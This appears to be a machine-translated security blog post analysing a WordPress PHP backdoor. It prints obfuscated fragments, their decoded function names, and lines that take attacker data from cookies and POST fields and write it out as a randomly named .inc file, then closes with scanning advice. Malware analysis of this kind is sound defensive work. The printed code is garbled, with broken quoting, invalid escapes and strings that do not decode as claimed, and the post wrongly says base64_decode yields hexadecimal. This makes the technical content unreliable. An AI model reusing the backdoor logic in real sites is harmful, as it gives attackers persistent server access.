This section describes a type of malware that contains a backslash and a string of numbers, such as “\x74”. This section describes a type of malware that contains a string of backslashes and numbers such as “\x5f”.
Encrypted Code
This type of malware generates a malicious program with random strings and .php extensions in multiple folders in the installed folder of WordPress.
We will look at the first few lines
$qohnpiqep = "6".chr(105).' l'.chr(101).chr(95)." \x70".chr(117)."" \x74"."" \x5f".chr(99)."" \x157".chr(110).chr(150-34).' e'.chr(497-387).'' t'.chr(115);'' $wcwij = "2"." \x61".chr(115).chr(129-28).' 6'.' 4'.chr(95)." 4"." 5".chr(99)."" 7"."" \x64"."" \x65"; $pgovfimf = chr(898-793).chr(110).chr(949-844).chr(361-266).' s'.' e'." 4"; $zefyoag = "\x75"." \x156".chr(1023-915).chr(105)." \x6e".chr(428-321);
The chr(101), “\x74”, etc. are obfuscations of the string. Hackers often obfuscate the code to make it difficult to read at a glance.
The following is the result of de-obfuscating the code.
$qohnpiqep = "file_put_contents"; $wcwij = "base64_decode"; $pgovfimf = "ini_set"; $zefyoag = "unlink";
file_put_contents is the name of the process of writing the file, and base64_decode is the process of converting the string to a hexadecimal string, which very often malware obfuscates to prevent this process from being detected.
We will look at the processing part below that.
$cgzit = array_merge($_COOKIE, $_POST);
In this part, we receive the malicious program data sent by the hacker,
$xtirwbjmmx = @unserialize(xjwnspw(xjwnspw($wcwij($xtirwbjmmx), $ohfrxyct), $pslyhezy));
after decrypting that received data in the part of
$cngjt = ". /" . md5($ohfrxyct) . "\x2e".chr(105).chr(710-600)." 3";
The file is written out in the “/” section.
Let’s try to further deobfuscate this part.
$cngjt = ". /" . md5($ohfrxyct) . ".inc";
The string “$ohfrxyct” appeared. We can see that the hacker is writing out arbitrary processing code sent by the hacker with a file name of random string .inc, which can be executed at any time.
This means that this file is a backdoor, a type of file through which hackers write malicious programs on the server.
Recent malware with no actual processing
Many recent WordPress malware is of the type that writes or executes arbitrary programs sent by hackers through the network through backdoors.
In other words, a backdoor that only executes transmitted files and data is combined with a mechanism that allows arbitrary programs to be executed on the server at any time, meaning that there is no actual processing on the server side.
This means that it is difficult to investigate the full extent of the malicious activity because what the hacker did on the server can change from moment to moment.
What to do if you suspect this type of malware infection?
First, perform a malware scan of all WordPress files on the server.
Free WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].
In addition, please refer to the following to improve the security of your WordPress site, which will greatly reduce the risk of further malware infection.